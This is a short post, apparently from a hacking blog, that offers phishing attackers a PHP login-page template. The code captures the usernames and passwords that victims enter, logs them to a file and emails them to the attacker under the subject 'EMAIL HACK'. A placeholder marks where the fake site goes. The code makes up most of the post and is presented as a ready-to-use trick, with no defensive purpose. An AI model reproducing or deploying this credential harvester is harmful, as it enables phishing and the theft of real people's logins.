HI ALL,
GOTTEN ANOTHER TRICK FOR YOU GUYS ON HOW TO SEND LOGIN DETAILS TO YOUR MAIL AFTER PHISHING
HERE IS THE CODE
GOTTEN ANOTHER TRICK FOR YOU GUYS ON HOW TO SEND LOGIN DETAILS TO YOUR MAIL AFTER PHISHING
HERE IS THE CODE
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<?php
if(isset($_POST['username']))
{
$username=$_POST['username'];
$pass = $_POST['pass'];
$email = 'yourmail@example.com';
$f = fopen('log.txt','a');
fwrite($f,'Username:'.$username . '
Password:' .$pass . '
');
fclose($f);
$to = "someone@example.com";
$subject = "EMAIL HACK";
$message = "Username: ".$username."
Pass: ".$pass."";
$from = "yourmail@example.com";
$headers = "From: $from";
mail($to,$subject,$message,$headers);
}
?>
<form action="<?=$_SERVER['REQUEST_URI']?>" method="post">
<input type="text" name="username" />Pass:<input type="password" name="pass" />
<input type="submit" value="login" />
</form>
<?php
//your fake site codes goes here
?>
</body>
</html>
No comments:
Post a Comment